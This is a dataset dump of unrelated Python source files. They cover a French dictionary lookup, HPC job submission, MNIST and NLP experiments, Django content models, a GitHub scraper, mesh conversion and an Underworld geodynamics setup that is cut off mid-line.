adresse\n url = url+urllib.parse.quote(mot) # mot avec caractere speciaux convertis en ascii/HTTP\n a=urllib.request.urlopen(url) # requète web\n #str1 = a.readall() # lecture de la réponse in python 3.5 read()\n str1 = a.read() # python 3.5 lecture de la réponse in python 3.5 read()\n tree = ET.fromstring(html.unescape(str1.decode())) # construction de l'arbre XML\n defi = tree.findall(\"*//{http://www.w3.org/1999/xhtml}span[@class='tlf_cdefinition']\") # récupération des balises span d'attribut class=...\n return defi\n\ndef printOneDef(mot):\n print(\"définition du CNRTL : http://www.cnrtl.fr/definition/\")\n deff = getWebDefinition(mot)\n print(deff[0].text)\n\ndef printAllDef(mot):\n print(\"définitions du CNRTL : http://www.cnrtl.fr/definition/\")\n deff = getWebDefinition(mot)\n for d in deff:\n print(\"-\",d.text) \n\ndef getAllDef(mot):\n deff = getWebDefinition(mot)\n L=list()\n for d in deff:\n L.append(d.text)\n return L\n\ndef getAllDefStr(mot):\n deff = getWebDefinition(mot)\n S=''\n for d in deff:\n S = S+(d.text)+\"\\n\"\n return S\n\nif __name__ == '__main__':\n mot = motAléatoire()\n print(mot)\n printAllDef(mot)\n\n","sub_path":"libpendu.py","file_name":"libpendu.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438928290","text":"#! /usr/bin/env python\n# Brokers communication between Delft3D and Dakota through files.\n# Mark Piper (mark.piper@colorado.edu)\n\nimport sys\nimport os\nimport shutil\nfrom subprocess import call\n\ndef main():\n '''\n Brokers communication between Delft3D and Dakota through files.\n '''\n start_dir = os.path.dirname(os.path.realpath(__file__))\n initialize_dir = os.path.join(start_dir, 'initialize')\n input_template = 'WLD.sed.template'\n input_file = 'WLD.sed'\n fake_file = 'fake.out'\n real_file = 'results.out'\n\n # Copy the contents of the initialize directory into the current\n # run directory. (Don't use shutil.copytree because the\n # destination directory exists.)\n for f in os.listdir(initialize_dir):\n shutil.copy(os.path.join(initialize_dir, f), os.getcwd())\n\n # Use the parsing utility `dprepro` (from $DAKOTA_DIR/bin) to\n # substitute the parameters from Dakota into the input template,\n # creating a new Delft3D input file.\n shutil.copy(os.path.join(start_dir, input_template), os.getcwd())\n call(['dprepro', sys.argv[1], input_template, input_file])\n\n # Call Delft3D, using the updated input file. Note that `qsub`\n # returns immediately with the PBS job id.\n job_name = 'Delft3D-Dakota' + os.path.splitext(os.getcwd())[1]\n call(['qsub', '-N', job_name, 'run_delft3d_wave.sh'])\n\n # Copy in a dummy results file to advance Dakota.\n shutil.copy(os.path.join(start_dir, fake_file), real_file)\n\nif __name__ == '__main__':\n main()\n","sub_path":"experiments/delft3d-vector-parameter-study-3/delft3d_run.py","file_name":"delft3d_run.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342106708","text":"import unittest\nfrom HTMLTestRunner import HTMLTestRunner\nsuite = unittest.TestSuite()\ntests = unittest.defaultTestLoader.discover(r\"D:\\Py-workspace\\pythonProject\\银行对象版\",pattern=\"Test*.py\")\nsuite.addTest(tests)\nf = open(file=\"银行测试报告.html\",mode=\"w+\",encoding=\"utf-8\")\nrunner = HTMLTestRunner.HTMLTestRunner(\n stream = f,\n title = \"这是一个银行测试报告!\",\n verbosity= 2,\n description = \"执行了银行的用例\"\n)\nrunner.run(suite)","sub_path":"银行单元测试代码/自动测试入口.py","file_name":"自动测试入口.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"51042009","text":"from util import NUM_NODES, read_file, get_initial_state, open_nodes, calc_heuristics\n\n\ndef pathfinding():\n open_states = []\n\n initial_state = get_initial_state(nodes)\n open_states.append(initial_state)\n\n while len(open_states) > 0:\n current_state = open_states[0]\n\n if len(current_state.path) == NUM_NODES:\n return current_state\n\n open_states = open_nodes(nodes, current_state, open_states)\n\n open_states.pop(0)\n open_states.sort(key=lambda x: (x.distance + x.node.h))\n\n return None\n\n\nnodes = read_file()\ncalc_heuristics(nodes)\nfinal_state = pathfinding()\n\nprint()\nprint(\"FINAL_PATH:\")\nfor n in final_state.path:\n print(n.index)\n","sub_path":"a-estrela.py","file_name":"a-estrela.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416629303","text":"\"\"\" Like logistic_regression_tf_full.py but the subgraph for performing a step of the \ngradient descent optimizer is added using a tensorflow function.\n\n\"\"\"\n\n\nfrom keras.layers import Input, Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.models import Model\nimport keras\n\nfrom load_mnist import load_mnist\nimport numpy as np\nimport math\n\n\ndef main():\n log_dir = '/tmp/mnist/nn_keras'\n\n train_data, validate_data, test_data = load_mnist('mnist.pkl.gz')\n\n # design matrix of shape (num_examples, dim_x); dim_x = 784\n x_all = train_data[0]\n num_examples = x_all.shape[0]\n dim_x = x_all.shape[1]\n \n # label matrix (N x 1)\n c_all = train_data[1]\n \n K = 10 # number of classes\n # target variable (num_examples, K)\n t_all = keras.utils.to_categorical(c_all)\n \n # the same for the test data\n test_x = test_data[0]\n test_c = test_data[1]\n test_t = keras.utils.to_categorical(test_c, K)\n \n\n batch_size = 600\n # learning rate\n eta = 0.01\n max_epochs = 1000\n num_neurons = 30\n\n\n # the network layers\n x = Input(shape=(784,))\n h1 = Dense(num_neurons, activation=keras.activations.relu)(x)\n h2 = Dense(num_neurons, activation=keras.activations.relu)(h1)\n h3 = Dense(num_neurons, activation=keras.activations.relu)(h2)\n h4 = Dense(num_neurons, activation=keras.activations.relu)(h3)\n\n h4_dropout = Dropout(0.5)(h4)\n\n y = Dense(10, activation=keras.activations.softmax)(h4_dropout)\n\n # Define the model and create the computational graph.\n model = Model(inputs=x, outputs=y)\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=eta),\n metrics=[keras.metrics.categorical_accuracy])\n\n # Train the model.\n model.fit(x_all, t_all,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_data=(test_x, test_t), \n callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=10)])\n\n \n # Evaluate the model\n score = model.evaluate(test_x, test_t, verbose=0)\n\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\nmain()\n","sub_path":"mnist/nn_5_dropout.py","file_name":"nn_5_dropout.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225104295","text":"from django.db import models\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\nfrom feincms.contrib.richtext import RichTextField\n\nfrom degrees.models import Category, Degree\nfrom quicklinks.models import QuickLinkGroup, QuickLink\nfrom contacts.models import Contact, ContactGroup\n\n\nclass SingleQuickLinkGroupContent(models.Model):\n group = models.ForeignKey(QuickLinkGroup)\n\n class Meta:\n verbose_name = _('Quick Link Group')\n verbose_name_plural = _('Quick Link Groups')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.group)\n\n return render_to_string('quicklinks/singlegroup.html', {\n 'content': self,\n 'links': links,\n })\n\n\nclass SingleContactContent(models.Model):\n title = models.CharField(_('Title'), max_length=100,\n help_text=_('A title for this contact (eg Contact)'),\n blank=True)\n contact = models.ForeignKey(Contact)\n\n class Meta:\n verbose_name = _('Single Contact')\n verbose_name_plural = _('Multiple Contacts')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n return render_to_string('contacts/single.html', {\n 'content': self\n })\n\n\nclass ContactGroupContent(models.Model):\n title = models.CharField(_('Title'), max_length=255,\n help_text=_('The displayed title of this group'))\n group = models.ForeignKey(ContactGroup,\n help_text=_('Specify the group to be displayed'))\n\n class Meta:\n verbose_name = _('Contact Group')\n verbose_name_plural = _('Contact Groups')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n contacts = Contact.objects.filter(group=self.group)\n\n return render_to_string('contacts/group.html', {\n 'content': self,\n 'contacts': contacts,\n })\n\n\nclass IntroContent(models.Model):\n\n BUTTONS = 'buttons'\n LINKS = 'links'\n\n LINK_TYPE_CHOICES = (\n (BUTTONS, _('Buttons'),),\n (LINKS, _('Links'),),\n )\n\n title = models.CharField(_('Title'), max_length=255,\n help_text=_('The title of the intro'))\n subtitle = models.CharField(_('Subtitle'),\n max_length=100,\n help_text=_('A subtitle above the title'),\n blank=True)\n intro = RichTextField(_('Intro'),\n help_text=_('The intro itself'))\n left_link = models.CharField(_('Link'),\n max_length=255,\n help_text=_('A Link that appears underneath the intro, without http://'),\n blank=True)\n left_link_text = models.CharField(_('Link_Text'),\n max_length=100,\n help_text=_('The text that is displayed as a link'),\n blank=True)\n link_type = models.CharField(_('Link_Type'),\n max_length=10,\n choices=LINK_TYPE_CHOICES,\n default=BUTTONS,\n help_text=_('''Define wheter the links should be\n displayed as links or buttons.'''))\n links = models.ForeignKey(QuickLinkGroup, blank=True, null=True)\n\n class Meta:\n verbose_name = _('Intro')\n verbose_name_plural = _('Intros')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.links)\n\n return render_to_string('intro/intro.html', {\n 'content': self,\n 'links': links\n })\n\n\nclass CategoryContent(models.Model):\n\n YES = 'teaser'\n NO = 'list'\n\n TEASER_CHOICES = (\n (YES, 'Teaser',),\n (NO, 'Information',),\n )\n\n category = models.ForeignKey(Category,\n verbose_name=_('Category'),\n related_name=_('Teasercontent'))\n teaser = models.CharField(_('Teaser'),\n max_length=10,\n choices=TEASER_CHOICES,\n default=NO,\n help_text=_('Specify wheter this is a teaser or a full list'))\n\n class Meta:\n verbose_name = _('Category Teaser')\n verbose_name_plural = _('Category Teasers')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n degrees = Degree.objects.filter(category=self.category)\n\n template = ''\n if self.teaser == self.NO:\n template = 'list'\n else:\n template = 'teaser'\n\n return render_to_string('degrees/category_' + template + '.html', {\n 'content': self,\n 'degrees': degrees,\n })\n\n\nclass ProxyRowContent(models.Model):\n title = models.CharField(_('Title'), max_length=125,\n help_text=_('The title of this row'))\n text = RichTextField(_('Text'))\n image = models.ImageField(_('Image'),\n upload_to='proxyrow/images',\n help_text=_('The image displayed on the left of the text'))\n download = models.FileField(_('Attachment'),\n help_text=_('A file (PDF) attachment'),\n upload_to='proxyrow/attachments',\n blank=True)\n download_text = models.CharField('Attachment_Text',\n max_length=255,\n help_text=_('The text displayed for the download link.'),\n blank=True)\n link_group = models.ForeignKey(QuickLinkGroup, blank=True,\n help_text=_('Display the links of a link group'),\n null=True)\n\n class Meta:\n verbose_name = _('Proxy Row')\n verbose_name_plural = _('Proxy Rows')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.link_group)\n\n return render_to_string('proxyrow/row.html', {\n 'content': self,\n 'links': links,\n })\n","sub_path":"unili/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"396839754","text":"import scrapy\n\nf = open('haha.txt', \"w\")\n\n# 'https://github.com/jquery/jquery/commits/master',\n# 'https://github.com/codeschool-projects/HelloCodeSchoolProject/commits/master'\n\nclass DummySpider(scrapy.Spider):\n name = \"dummy\"\n start_urls = [\n 'https://github.com/codeschool-projects/HelloCodeSchoolProject/commits/master'\n ]\n download_delay = 0.05\n\n\n\n def doit(self, response):\n arr = response.xpath('//tr//span/text()').extract()\n string = \"\"\n for stri in arr:\n string += stri\n yield {\n 'insider': string,\n }\n\n def parse(self, response):\n for listitem in response.xpath('//li[@class=\"commit commits-list-item js-commits-list-item table-list-item js-navigation-item js-details-container Details js-socket-channel js-updatable-content\"]'):\n rel_url = listitem.xpath('div/div/a/@href').extract_first()\n complete_url = response.urljoin(rel_url)\n yield {\n 'RevisionId': complete_url,\n 'TimeStamp': listitem.xpath('div/div/div/relative-time/@datetime').extract_first(),\n 'Contributors': listitem.xpath('div/div/div/a/text()').extract_first(),\n 'EditDetails': listitem.xpath('div/p/a/text()').extract_first(),\n }\n f.write(complete_url + '\\n')\n #response.follow(rel_url, self.doit)\n\n next_page = response.xpath('//div/div/div/div/div/div/div/a/@href')[-1].extract()\n if next_page is not None:\n yield response.follow(next_page, self.parse)\n","sub_path":"Github-Spider/dummy_spider1.py","file_name":"dummy_spider1.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334876221","text":"import pandas as pd\nimport numpy as np\nimport os\n\n# TODO: use .txt file instead of .csv file?\n\n\n# convert dictionay to cmd args in the form \"--key value\"\ndef dict_to_cmd_args(d):\n s = []\n for key, value in d.items():\n s.append(\"--\"+key+\" \"+str(value))\n return \" \".join(s)\n\n\ndef read_job_id_from_job_name(job_name):\n # find slurm job id based on given job name and read it\n job_id = os.popen('squeue --noheader --format %i --name {}'\n .format(job_name)).read()\n # since they are all array jobs, only take the job id not the array id\n dependency_job_id = job_id.split(\"_\")[0]\n return dependency_job_id\n\n\ndef main():\n # create jobs file text in this script from which a temporary file will\n # be created\n job_file = (\n \"#!/bin/bash\\n\"\n \"# redirect the output/error to some files\\n\"\n \"#SBATCH -o /home/fiederer/out/%A-%a.o\\n\"\n \"#SBATCH -e /home/fiederer/error/%A-%a.e\\n\"\n # \"export PYTHONPATH={}\\n\"\n \"{}\\n\"\n \"{}\\n\"\n \"python {} {}\\n\")\n\n configs_file = \"/home/fiederer/nicebot/metasbat_files/configs.csv\"\n # load all the configs to be run\n configs_df = pd.DataFrame.from_csv(configs_file).T\n\n # specify python path, virtual env and python script to be run\n # python_path = '/home/fiederer/nicebot'\n source_call = 'source /home/fiederer/.bashrc'\n virtual_env = 'conda activate braindecode'\n python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_kisbat.py')\n # python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_acrossSubjects_kisbat.py')\n # python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_withinSubjects_kisbat.py')\n\n # specify temporary job file and command to submit\n # schedule to different hosts. only one jost per host\n # hosts = [\"metagpua\", \"metagpub\", \"metagpuc\", \"metagpud\", \"metagpue\"]\n # queue = \"ml_gpu-rtx2080\"\n script_name = \"/home/fiederer/jobs/slurm/run_tmp.sh\"\n # batch_submit = \"sbatch -p queue -w host -c num_workers --array={}-{} --job-name=b_{}_j_{} {} {}\"\n\n # sbatch -p meta_gpu-ti -w metagpub -c 4 jobs/slurmbjob.pbs\n\n # loop through all the configs\n for setting in configs_df:\n model_name = configs_df[setting]['model_name']\n if any([model_name == a for a in ['lin_reg', 'lin_svr', 'rbf_svr', 'rf_reg']]):\n # Specify queue\n # queue = \"ml_gpu-rtx2080\"\n # queue = 'ml_cpu-ivy'\n queue = 'cpu_ivy'\n if model_name == 'rf_reg':\n batch_submit = \"sbatch -p {queue} -c 16 {script_name}\"\n else:\n batch_submit = \"sbatch -p {queue} -c 1 {script_name}\"\n # batch_submit = \"sbatch -p {queue} -c 1 --gres=gpu:0 {script_name}\"\n elif any([model_name == a for a in ['eegnet', 'deep4', 'resnet']]):\n # queue = \"meta_gpu-black\"\n # queue = \"ml_gpu-rtx2080\"\n # queue = \"meta_gpu-ti\"\n # queue = \"meta_gpu-x\"\n queue = ['meta_gpu-black', 'meta_gpu-x', 'meta_gpu-ti', 'ml_gpu-rtx2080'][np.random.randint(1, 3)] # 0, 4\n batch_submit = \"sbatch -p {queue} -c 2 --gres=gpu:1 {script_name}\"\n else:\n os.warnin('Cannot define queue for model {:s}'.format(model_name))\n\n # configs_df[setting]['result_folder'] = '/data/schirrmr/fiederer/nicebot/results'\n config = configs_df[setting].to_dict()\n # create a tmp job file / job for every config\n cmd_args = dict_to_cmd_args(config)\n curr_job_file = job_file.format(source_call,\n virtual_env,\n python_file, cmd_args)\n\n # write tmp job file and submit it to slurm\n with open(script_name, \"w\") as f:\n f.writelines(curr_job_file)\n\n # print(batch_submit.format(queue=queue, script_name=script_name))\n os.system(batch_submit.format(queue=queue, script_name=script_name))\n\n\nif __name__ == '__main__':\n # TODO: add arg parse\n main()\n","sub_path":"metasbat_files/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515823012","text":"import math\nimport trimesh\nimport argparse\nimport numpy as np\nfrom pathlib import Path\nimport ipdb\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-f', '--file', metavar='N', type=str, help='Obj File')\n args = parser.parse_args()\n return args\n\ndef save_as_glb(obj_file_path, mesh, gltf=False):\n p = Path(obj_file_path)\n suffix = '.gltf' if gltf else '.glb'\n p = p.with_suffix(suffix)\n mesh.export(str(p))\n\ndef get_rotatation_matrix(origin):\n radius = np.linalg.norm(origin)\n lat = np.arcsin(origin[2] / radius)\n lon = np.arctan2(origin[1], origin[0])\n\n sin_lat = np.sin(lat)\n cos_lat = np.cos(lat)\n sin_lon = np.sin(lon)\n cos_lon = np.cos(lon)\n\n Rz = np.array([[cos_lon, sin_lon, 0, 0], [-sin_lon, cos_lon, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n Ry = np.array([[cos_lat, 0, sin_lat, 0], [0, 1, 0, 0], [-sin_lat, 0, cos_lat, 0], [0, 0, 0, 1]])\n\n sin_90 = np.sin(-math.radians(90))\n cos_90 = np.cos(-math.radians(90))\n Rf = np.array([[cos_90, sin_90, 0, 0], [-sin_90, cos_90, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n # print(lat, math.degrees(lat), lon, math.degrees(lon) )\n # Rz = np.eye(4)\n # Ry = np.eye(4)\n R = Rf @ Ry @ Rz\n\n return R\n\ndef get_mesh_mean(mesh_obj):\n return np.mean(np.mean(mesh_obj.triangles,axis=0), axis=0)\n\ndef translate_scene(mesh, mesh_min):\n for key, geom in mesh.geometry.items():\n geom.apply_translation(-mesh_min)\n\ndef rotate_scene(mesh, rotation_matrix):\n for key, geom in mesh.geometry.items():\n geom.apply_transform(rotation_matrix)\n\ndef scale_obj(obj_file_path):\n mesh = trimesh.load_mesh(obj_file_path)\n mesh_min = get_mesh_mean(mesh)\n rot_matrix = get_rotatation_matrix(mesh_min)\n print(\"Mean Value of Mesh: \", mesh_min)\n translate_scene(mesh, mesh_min)\n rotate_scene(mesh,rot_matrix)\n # mesh.show()\n save_as_glb(obj_file_path, mesh)\n\n\ndef main():\n args = parse_args()\n scale_obj(args.file)\n # convert_obj_to_glb(args.file)\n\nif __name__ == \"__main__\":\n main()","sub_path":"reversegoogle/obj_to_glb.py","file_name":"obj_to_glb.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498690762","text":"import nltk\nimport numpy as np\nfrom nltk import sent_tokenize, word_tokenize, pos_tag\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom bs4 import BeautifulSoup\nfrom nltk import sent_tokenize, word_tokenize, pos_tag\nimport nltk\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom nltk.stem import WordNetLemmatizer\nimport re\nimport pandas as pd\n\nimport tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport re\n \nconsumer_key = '12345'\nconsumer_secret = '12345'\naccess_token = '123-12345'\naccess_secret = '12345'\n \nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n \napi = tweepy.API(auth)\n\nnumber_tweets=100\ndata=[]\nfor status in tweepy.Cursor(api.search,q=\"trump\").items(number_tweets):\n try:\n URLless_string = re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', '', status.text)\n data.append(URLless_string)\n except:\n pass\n\nlemmatizer = WordNetLemmatizer()\n\ntext=data\n\nsentences = sent_tokenize(str(text))\nsentences2=sentences\nsentences2\n\ntokens = word_tokenize(str(text))\ntokens=[lemmatizer.lemmatize(tokens[i]) for i in range(0,len(tokens))]\n\nlen(tokens)\n\ntagged_tokens = pos_tag(tokens)\ntagged_tokens\n\n## NOUNS\ntext2 = word_tokenize(str(text))\nis_noun = lambda pos: pos[:2] == 'NN'\nb=nltk.pos_tag(text2)\nb\nnouns = [word for (word, pos) in nltk.pos_tag(text2) if is_noun(pos)] \nnouns\nV = set(nouns)\nlong_words1 = [w for w in tokens if 4 1]\n for text in texts]\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/deerwester4.dict')\n\nprint(dictionary.token2id)\n\n\n## VETOR DAS FRASES\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/deerwester4.mm', corpus) # store to disk, for later use\nprint(corpus)\n\nfrom gensim import corpora, models, similarities\ntfidf = models.TfidfModel(corpus) # step 1 -- initialize a model\n\n\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n print(doc)\n\nlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=2)\ncorpus_lsi = lsi[corpus_tfidf] # create a double wrapper over the original corpus: bow->tfidf->fold-in-lsi\n\nlsi.print_topics(2)\n\n## COORDENADAS DOS TEXTOS\ntodas=[]\nfor doc in corpus_lsi: # both bow->tfidf and tfidf->lsi transformations are actually executed here, on the fly\n todas.append(doc)\ntodas\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/deerwester4.dict')\ncorpus = corpora.MmCorpus('/tmp/deerwester4.mm') # comes from the first tutorial, \"From strings to vectors\"\nprint(corpus)\n\nnp.array(corpus).shape\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n\np=[]\nfor i in range(0,len(documents)):\n doc1 = documents[i]\n vec_bow2 = dictionary.doc2bow(doc1.lower().split())\n vec_lsi2 = lsi[vec_bow2] # convert the query to LSI space\n p.append(vec_lsi2)\n \np\n \nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester4.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester4.index')\n\n#################\n\nimport gensim\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib as mpl\n\nmatrix1 = gensim.matutils.corpus2dense(p, num_terms=4)\nmatrix3=matrix1.T\nmatrix3\n\nfrom sklearn import manifold, datasets, decomposition, ensemble,discriminant_analysis, random_projection\n\ndef norm(x):\n return (x-np.min(x))/(np.max(x)-np.min(x))\n\nX=norm(matrix3)\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0,perplexity=50,verbose=1,n_iter=1500)\nX_tsne = tsne.fit_transform(X)\n\n### WORK HERE - COMO DESCOBRI QUE TINHA 3 CLUSTERS ???? SORT X_tsne\n## DEFINE K-MEANS\nplt.hist(X_tsne)\n\nfrom sklearn.cluster import KMeans\nmodel3=KMeans(n_clusters=4,random_state=0)\nmodel3.fit(X_tsne)\ncc=model3.predict(X_tsne)\n\n## ALSO TRY COM X PARA VER QUE TOPICO SELECIONA\n\ntokens2 = word_tokenize(str(sentences2))\ntokens2\n\ntokens2=[lemmatizer.lemmatize(tokens2[i]) for i in range(0,len(tokens2))]\n\nlong_words12 = [w for w in tokens2 if len(w) > 5]\nsorted(long_words12)\nfdist012 = nltk.FreqDist(long_words12)\na12=fdist012.most_common(5)\n\nfrom matplotlib.colors import LinearSegmentedColormap\n\nprint('TOPIC 1\\n')\n\nprint(a12,'\\n')\n\nfor i in np.where(cc==2)[0][2:10]:\n print(i,sentences2[i])\n\nn_classes=4\ncolors = [(1, 0, 0), (0, 1, 0), (0, 0, 1),(0,0,0)] \ncm = LinearSegmentedColormap.from_list(\n cc, colors, N=4)\ncor=[colors[cc[i]] for i in range(0,len(cc))]\n\nh=[]\nlabel=[]\nfig = plt.figure(figsize=(8,4))\nplt.title('NATURAL LANGUAGE PROCESSING\\n\\n'+'TOPIC MODELING at TWITTER HASHTAG: '+'#trump',fontweight=\"bold\")\nfor i in range(0,4):\n label.append('Topic {}'.format([0,1,2,3][i]))\n plt.scatter(X_tsne[:, 0], X_tsne[:, 1],c=cc,cmap=cm,marker='o',s=100)\n h1,=plt.plot(1,1,color=colors[i],linewidth=3)\n h.append(h1)\nplt.legend(h,label,loc=\"upper left\")\nplt.show()\nmodel = models.LdaModel(corpus, id2word=dictionary, num_topics=4)\nmodel.print_topics(4)\n\n### ACCUMULATE FEELINGS\n\nfrom nltk.sentiment import SentimentAnalyzer\nfrom nltk.sentiment.util import *\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer as sia\nsentim=sia()\n\ncc0=[]\nfor sentence in documents:\n cc0.append(sentim.polarity_scores(sentence))\n\nneu=[]\nneg=[]\nfor sentence in documents:\n ss = sentim.polarity_scores(sentence)\n for k in sorted(ss):\n print('{0}: {1}, '.format(k, ss[k]), end='')\n neg.append(ss[k])\n neu.append(k)\n print()\n print('\\n')\n\nf=int(len(neg)/4)\nsent0=np.array(neu).reshape(f,4)\nsent=np.array(neg).reshape(f,4)\ncomp=sent.T[0]\n\n\npositivos=len(np.where(np.array(comp)>0)[0])\nneutros=len(np.where(np.array(comp)==0)[0])\nnegativos=len(np.where(np.array(comp)<0)[0])\n\nfrom matplotlib import style\nprint(plt.style.available)\n\nstyle.use(\"seaborn-darkgrid\")\n\nx = np.arange(0, len(comp), 1)\nplt.figure(figsize=(9,6))\nplt.plot(np.cumsum(comp),linewidth=3,color='blue')\nplt.fill_between(x,np.cumsum(comp),0,where=np.cumsum(comp)<0,facecolor='red',alpha=.7)\nplt.fill_between(x,np.cumsum(comp),0,where=np.cumsum(comp)>0,facecolor='lawngreen',alpha=.7)\nplt.annotate('POSITIVE',(140,1.5),fontweight='bold')\nplt.annotate('NEGATIVE',(140,-3),fontweight='bold')\nplt.title('Natural Language Processing\\n'+'\\n'+'Mood in Twitter Streaming #trump Feb 23, 2017 - 5 Minutes',fontweight='bold')\nplt.show()\n","sub_path":"examples/rubens/nlp_twitter_streaming_mood.py","file_name":"nlp_twitter_streaming_mood.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323120814","text":"from examples.linear_regression_experiment.mnist_data.miracle import MnistMiracle\nimport os\nNO_KL_ITERATIONS = 2000\nKL_ITERATIONS = 80000\nRETRAIN_ITERATIONS = 3000\n\nBITS_PER_BLOCK = 10\nBLOCK_SIZE = 15\nHASH_GROUP_SIZE = 1\nOUT_DIR = 'out/compressed'\nOUT_FILE = 'trainp_bits{}_block{}_hash{}.mrcl'.format(BITS_PER_BLOCK, BLOCK_SIZE, HASH_GROUP_SIZE)\n\nmm = MnistMiracle(bits_per_block=BITS_PER_BLOCK, block_size_vars=BLOCK_SIZE, hash_group_size_vars=HASH_GROUP_SIZE,\n out_dir=OUT_DIR)\n\n# mm.pretrain(NO_KL_ITERATIONS)\n# mm.train(KL_ITERATIONS)\n#\n# mm.compress(RETRAIN_ITERATIONS, OUT_FILE)\n\nmm.load_model(os.path.join(OUT_DIR, OUT_FILE))\nmm.test(kl_loss=False)","sub_path":"examples/linear_regression_experiment/mnist_data/run_miracle.py","file_name":"run_miracle.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234782529","text":"import os\nos.environ[\"UW_ENABLE_TIMING\"] = \"1\"\nimport underworld as uw\nfrom underworld import function as fn\nimport glucifer\nimport math\nimport numpy as np\nimport time\ntime_post_import = time.time()\ntime_launch_srun = float(os.environ[\"TIME_LAUNCH_SRUN\"])/1000.\ntime_launch_python = float(os.environ[\"TIME_LAUNCH_PYTHON\"])/1000.\nuw.timing.start()\n\nif os.environ[\"UW_ENABLE_IO\"] == \"1\":\n do_IO=True\nelse:\n do_IO=False\n\nother_timing = {}\nother_timing[\"Python_Import_Time\"] = time_post_import - time_launch_python\nother_timing[\"Container_Launch_Time\"] = time_launch_python - time_launch_srun\n\nres = 64\nRESKEY = \"UW_RESOLUTION\"\nif RESKEY in os.environ:\n res = int(os.environ[RESKEY])\n\nPREFIX = os.environ[\"PREFIXSTRING\"]\n\nmesh = uw.mesh.FeMesh_Cartesian(elementRes = (res, res, res),\n minCoord = ( 0., 0., 0., ),\n maxCoord = ( 1., 1., 1., ))\n\nvelocityField = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=3 )\npressureField = uw.mesh.MeshVariable( mesh=mesh.subMesh, nodeDofCount=1 )\ntemperatureField = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=1 )\ntemperatureFieldDeriv = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=1 )\n\n# initialise \nvelocityField.data[:] = [0.,0.,0.]\npressureField.data[:] = 0.\n\nfor index, coord in enumerate(mesh.data):\n temperatureField.data[index] = coord[2]\n\ntemperatureFieldDeriv.data[:] = 0.\n\n\n# Create a swarm.\nswarm = uw.swarm.Swarm( mesh=mesh )\n\n# Create a data variable. It will be used to store the material index of each particle.\nmaterialIndex = swarm.add_variable( dataType=\"int\", count=1 )\n\n# Create a layout object, populate the swarm with particles.\nswarmLayout = uw.swarm.layouts.PerCellSpaceFillerLayout( swarm=swarm, 